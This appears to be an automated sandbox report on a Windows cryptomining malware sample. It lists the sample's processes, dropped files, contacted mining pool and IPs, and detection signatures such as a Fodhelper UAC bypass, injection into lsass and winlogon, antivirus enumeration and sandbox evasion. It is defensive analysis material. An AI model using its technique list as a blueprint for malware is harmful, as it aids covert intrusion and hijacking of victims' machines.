Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 94_2_0000000140002300
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF6717C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_00007FF6CF6717C0
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
AV process strings found (often used to terminate AV products)
Source: dllhost.exe Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528504 Sample: e7WMhx18XN.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 163 pool.hashvault.pro 2->163 189 Sigma detected: Xmrig 2->189 191 Malicious sample detected (through community Yara rule) 2->191 193 Antivirus / Scanner detection for submitted sample 2->193 195 25 other signatures 2->195 14 e7WMhx18XN.exe 8 2->14         started        17 services64.exe 2->17         started        20 powershell.exe 2->20         started        22 10 other processes 2->22 signatures3 process4 file5 151 C:\Users\user\AppData\Local\Temp\paint.exe, PE32+ 14->151 dropped 153 C:\Users\user\...\FodhelperBypassUAC.exe, PE32+ 14->153 dropped 155 C:\Users\user\AppData\Local\Temp\b.bat, DOS 14->155 dropped 157 C:\Users\user\AppData\...\e7WMhx18XN.exe.log, CSV 14->157 dropped 24 cmd.exe 1 14->24         started        27 paint.exe 14->27         started        29 FodhelperBypassUAC.exe 2 14->29         started        169 Antivirus detection for dropped file 17->169 171 Machine Learning detection for dropped file 17->171 173 Writes to foreign memory regions 17->173 185 2 other signatures 17->185 31 conhost.exe 6 17->31         started        175 Modifies the context of a thread in another process (thread injection) 20->175 177 Injects a PE file into a foreign processes 20->177 34 dllhost.exe 20->34         started        36 conhost.exe 20->36         started        179 Suspicious powershell command line found 22->179 181 Query firmware table information (likely to detect VMs) 22->181 183 Changes security center settings (notifications, updates, antivirus, firewall) 22->183 38 dllhost.exe 22->38         started        40 powershell.exe 22->40         started        42 14 other processes 22->42 signatures6 process7 file8 201 Suspicious powershell command line found 24->201 219 2 other signatures 24->219 44 powershell.exe 24->44         started        58 4 other processes 24->58 203 Antivirus detection for dropped file 27->203 205 Machine Learning detection for dropped file 27->205 221 2 other signatures 27->221 48 conhost.exe 4 27->48         started        207 UAC bypass detected (Fodhelper) 29->207 50 cmd.exe 1 29->50         started        159 C:\Users\user\AppData\...\sihost64.exe, PE32+ 31->159 dropped 161 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 31->161 dropped 209 Found strings related to Crypto-Mining 31->209 211 Injects code into the Windows Explorer (explorer.exe) 31->211 213 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 31->213 223 2 other signatures 31->223 60 2 other processes 31->60 215 Contains functionality to inject code into remote processes 34->215 225 2 other signatures 34->225 52 winlogon.exe 34->52 injected 217 Creates a thread in another existing process (thread injection) 38->217 54 lsass.exe 38->54 injected 56 cmd.exe 40->56         started        63 3 other processes 42->63 signatures9 process10 dnsIp11 147 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 44->147 dropped 235 Sets debug register (to hijack the execution of another thread) 44->235 237 Modifies the context of a thread in another process (thread injection) 44->237 239 Suspicious command line found 44->239 241 Found suspicious powershell code related to unpacking or dynamic code loading 44->241 65 cmd.exe 44->65         started        149 C:\Users\user\AppData\...\services64.exe, PE32+ 48->149 dropped 68 cmd.exe 1 48->68         started        70 cmd.exe 1 48->70         started        72 fodhelper.exe 12 50->72         started        74 conhost.exe 50->74         started        80 3 other processes 56->80 243 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 58->243 165 pool.hashvault.pro 45.76.89.70, 54464, 80 AS-CHOOPAUS United States 60->165 245 Antivirus detection for dropped file 60->245 247 Query firmware table information (likely to detect VMs) 60->247 249 Machine Learning detection for dropped file 60->249 251 4 other signatures 60->251 76 conhost.exe 60->76         started        78 conhost.exe 63->78         started        82 5 other processes 63->82 file12 signatures13 process14 signatures15 187 Suspicious powershell command line found 65->187 84 powershell.exe 65->84         started        86 conhost.exe 65->86         started        88 cmd.exe 65->88         started        90 services64.exe 68->90         started        93 conhost.exe 68->93         started        95 conhost.exe 70->95         started        97 schtasks.exe 1 70->97         started        99 cmd.exe 1 72->99         started        process16 signatures17 101 cmd.exe 84->101         started        229 Writes to foreign memory regions 90->229 231 Allocates memory in foreign processes 90->231 233 Creates a thread in another existing process (thread injection) 90->233 104 conhost.exe 2 90->104         started        106 conhost.exe 99->106         started        process18 signatures19 197 Suspicious powershell command line found 101->197 199 Suspicious command line found 101->199 108 powershell.exe 101->108         started        112 conhost.exe 101->112         started        114 WMIC.exe 101->114         started        118 2 other processes 101->118 116 WerFault.exe 20 16 104->116         started        process20 dnsIp21 167 147.185.221.22, 54593, 54594, 54595 SALSGIVERUS United States 108->167 253 Creates autostart registry keys with suspicious values (likely registry only malware) 108->253 255 Creates autostart registry keys with suspicious names 108->255 257 Creates an autostart registry key pointing to binary in C:\Windows 108->257 259 5 other signatures 108->259 120 powershell.exe 108->120         started        123 powershell.exe 108->123         started        125 powershell.exe 108->125         started        127 2 other processes 108->127 signatures22 process23 signatures24 227 Injects a PE file into a foreign processes 120->227 129 conhost.exe 120->129         started        131 powershell.exe 120->131         started        133 conhost.exe 123->133         started        135 powershell.exe 123->135         started        137 conhost.exe 125->137         started        139 powershell.exe 125->139         started        141 conhost.exe 127->141         started        143 conhost.exe 127->143         started        145 powershell.exe 127->145         started        process25
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.76.89.70
 pool.hashvault.pro United States
20473 AS-CHOOPAUS true
147.185.221.22
 unknown United States
12087 SALSGIVERUS true

Contacted Domains

Name IP Active
pool.hashvault.pro 45.76.89.70 true